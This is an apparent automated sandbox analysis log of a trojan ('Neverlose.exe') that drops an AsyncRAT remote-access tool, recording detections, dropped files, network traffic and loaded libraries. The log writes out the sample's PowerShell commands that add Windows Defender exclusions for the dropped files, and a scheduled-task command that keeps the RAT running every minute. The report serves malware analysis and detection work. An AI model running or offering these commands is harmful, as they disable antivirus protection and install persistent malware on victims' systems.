                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
                  Source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe.0.dr | String found in binary or memory: https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txtd
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://resources.github.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://resources.github.com/learn/pathways
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://skills.github.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://user-images.githubusercontent.com/
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2

                  Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process information set: 01 00 00 00

                  System Summary

Source: 4.0.Solara.exe.da0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Neverlose.exe.3942eb0.5.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Neverlose.exe.3939200.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Solara.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\sv_chost.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Neverlose.exe | Static PE information: section name: (nameless)
Source: Neverlose.exe | Static PE information: section name: (nameless)
Source: Neverlose.exe | Static PE information: section name: (nameless)
Source: Neverlose.exe | Static PE information: section name: (nameless)
Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_010232A6
Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_02E740F0
Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_02E71160
Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_02E747A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04F6B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04F6B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04F60C62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08F93A98
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 4_2_00007FFD9B698586
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 4_2_00007FFD9B691679
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 4_2_00007FFD9B699332
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 4_2_00007FFD9B6913AD
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 4_2_00007FFD9B69204D
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 4_2_00007FFD9B6916B9
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 4_2_00007FFD9B690EFA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Code function: 5_2_01310890
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Code function: 5_2_01310880
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 10_2_00007FFD9B691679
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 10_2_00007FFD9B69204D
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 10_2_00007FFD9B6916B9
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 10_2_00007FFD9B690EFA
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 15_2_00007FFD9B681679
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 15_2_00007FFD9B68204D
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 15_2_00007FFD9B6816B9
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Code function: 15_2_00007FFD9B680EFA
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 24_2_00007FFD9B6B1679
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 24_2_00007FFD9B6B204D
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 24_2_00007FFD9B6B16B9
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 24_2_00007FFD9B6B0EFA
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 25_2_00007FFD9B6C1679
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 25_2_00007FFD9B6C204D
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 25_2_00007FFD9B6C16B9
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 25_2_00007FFD9B6C0EFA
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 26_2_00007FFD9B6C1679
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 26_2_00007FFD9B6C204D
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 26_2_00007FFD9B6C16B9
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Code function: 26_2_00007FFD9B6C0EFA
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Solara.exe 645697F87E53786ED389243B7C493452D1F4DDE157741BBE27D31F4BD87F833B
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\sv_chost.exe 645697F87E53786ED389243B7C493452D1F4DDE157741BBE27D31F4BD87F833B
Source: C:\Users\user\Desktop\Neverlose.exe | Code function: String function: 0100C264 appears 99 times
Source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs Neverlose.exe
Source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameExloader.exe4 vs Neverlose.exe
Source: Neverlose.exe, 00000000.00000002.1726255425.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameS vs Neverlose.exe
Source: Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs Neverlose.exe
Source: Neverlose.exe, 00000000.00000000.1661428680.0000000001006000.00000080.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSolar.exe4 vs Neverlose.exe
Source: Neverlose.exe | Binary or memory string: OriginalFilenameSolar.exe4 vs Neverlose.exe
Source: Neverlose.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.0.Solara.exe.da0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Neverlose.exe.3942eb0.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Neverlose.exe.3939200.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\Solara.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\sv_chost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Neverlose.exe | Static PE information: Section: (nameless) ZLIB complexity 1.000396728515625
Source: Neverlose.exe | Static PE information: Section: (nameless) ZLIB complexity 1.021484375
Source: Neverlose.exe | Static PE information: Section: .data ZLIB complexity 0.9972337805706522
Source: Solara.exe.0.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Solara.exe.0.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Solara.exe.0.dr, E8phRKCKw5AfpQsOlZWL2sYGK.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, rKw0lbvJvj9v9nQmNRYVdkaAc.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, rKw0lbvJvj9v9nQmNRYVdkaAc.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, E8phRKCKw5AfpQsOlZWL2sYGK.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: sv_chost.exe.4.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: sv_chost.exe.4.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: sv_chost.exe.4.dr, E8phRKCKw5AfpQsOlZWL2sYGK.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: sv_chost.exe.4.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: sv_chost.exe.4.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Solara.exe.0.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Solara.exe.0.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@29/31@4/3
Source: C:\Users\user\Desktop\Neverlose.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Neverlose.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Mutant created: \Sessions\1\BaseNamedObjects\R6lKB8yQzd1uAv9U
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_03
Source: C:\Users\user\Desktop\Neverlose.exe | Mutant created: \Sessions\1\BaseNamedObjects\yP4EFLGPJOhez7VB7
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
Source: C:\Users\user\Desktop\Neverlose.exe | File created: C:\Users\user\AppData\Local\Temp\Solara.exe
Source: C:\Users\user\Desktop\Neverlose.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Neverlose.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Neverlose.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Neverlose.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Neverlose.exe | Virustotal: Detection: 41%
Source: Neverlose.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\Neverlose.exe | File read: C:\Users\user\Desktop\Neverlose.exe
Source: unknown | Process created: C:\Users\user\Desktop\Neverlose.exe "C:\Users\user\Desktop\Neverlose.exe"
Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_chost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\sv_chost.exe C:\Users\user\AppData\Roaming\sv_chost.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\sv_chost.exe "C:\Users\user\AppData\Roaming\sv_chost.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\sv_chost.exe "C:\Users\user\AppData\Roaming\sv_chost.exe"
Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
Source: C:\Users\user\Desktop\Neverlose.exe | Process created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara.exe'
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_chost.exe'
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Neverlose.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: mscoree.dllJump to behavior
